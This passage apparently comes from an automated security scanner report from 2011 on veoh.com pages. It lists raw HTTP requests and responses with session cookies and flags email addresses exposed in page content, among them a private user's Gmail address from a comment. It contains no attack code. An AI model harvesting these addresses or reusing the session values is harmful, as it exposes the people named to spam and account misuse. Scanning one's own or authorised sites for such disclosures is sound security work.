Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:43 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 134408
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=73
Content-Length: 147258
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
optout@veoh.com
privacy@veoh.com
Request
GET /corporate/privacypolicy HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:33 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=21
Content-Length: 36356
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/ ...[SNIP]... <a href="mailto:privacy@veoh.com">privacy@veoh.com</a> ...[SNIP]... certain communications from us regarding products and services in which you may be interested. If you do not opt-out at the time you provide information, but choose to opt-out later, send an email to optout@veoh.com or click <a href="mailto:optout@veoh.com"> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
PRABANSHU.JI@GMAIL.COM
advertising@veoh.com
Request
GET /users/Veoh-Upcoming-Movies HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=44
Content-Length: 31732
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/ ...[SNIP]... <p class="comment-body">Hey I am psychologist. To solve any problems relatad to human life. As well as pc & net problems also. So to asked question?..mail me PRABANSHU.JI@GMAIL.COM</p> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...